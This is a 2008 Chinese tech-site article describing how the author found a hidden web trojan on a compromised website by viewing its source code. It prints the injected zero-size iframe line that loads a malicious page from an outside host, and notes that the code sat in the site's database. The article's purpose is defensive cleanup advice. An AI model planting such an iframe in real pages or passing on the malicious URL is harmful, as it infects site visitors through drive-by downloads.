科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道揪出隐藏的网页木马

揪出隐藏的网页木马

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

前段时间在网管员论坛上的黑客技术版看到一个帖子,帖子内容是某网站被别人挂上了木马,想找出木马地址,同时给出了网站地址。笔者打开网站的连接地址,一会儿瑞星就发现了一个木马病毒(如图1)。

来源:论坛整理 2008年8月2日

关键字: 安全防范 病毒 木马

  • 评论
  • 分享微博
  • 分享邮件

前段时间在网管员论坛上的黑客技术版看到一个帖子,帖子内容是某网站被别人挂上了木马,想找出木马地址,同时给出了网站地址。笔者打开网站的连接地址,一会儿瑞星就发现了一个木马病毒(如图1)。

 
图1

看来这个网站确实被入侵者挂了木马。网页木马一般是利用浏览器的漏洞,使浏览者的浏览器执行木马程序从而控制感染病毒的机器,大部分是采用在网页上放上一个带木马的网页,那我们就到被种下木马的网页上找那个带木马的网页。
笔者在网站的空白处点了一下右键,左键点“查看源代码”,源代码窗口出现后,按一下F3,搜索http://,找到一段可疑的代码:

<IFRAME src='\"http://vvvq.go2.icpcn.com/110.htm\" width=\"0\" height=\"0\" frameborder=\"0\"></IFRAME>

打开这个http://vvvq.go2.icpcn.com/110.htm地址看一下,果然瑞星再次提示有病毒,看来这就是带木马的网页了。
接下来笔者把这个情况告诉了发帖者,让他到网站的首页代码搜索一下这个地址,删除这段代码就可以了,可是发帖者回复说并没有在首页找到这段代码而是在后台数据库里找到了,看来入侵者也真够狡猾的,至于入侵者如何入侵成功的本文就不做详细讨论了,希望这篇文章能给大家提供一个解决类似问题的方法。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章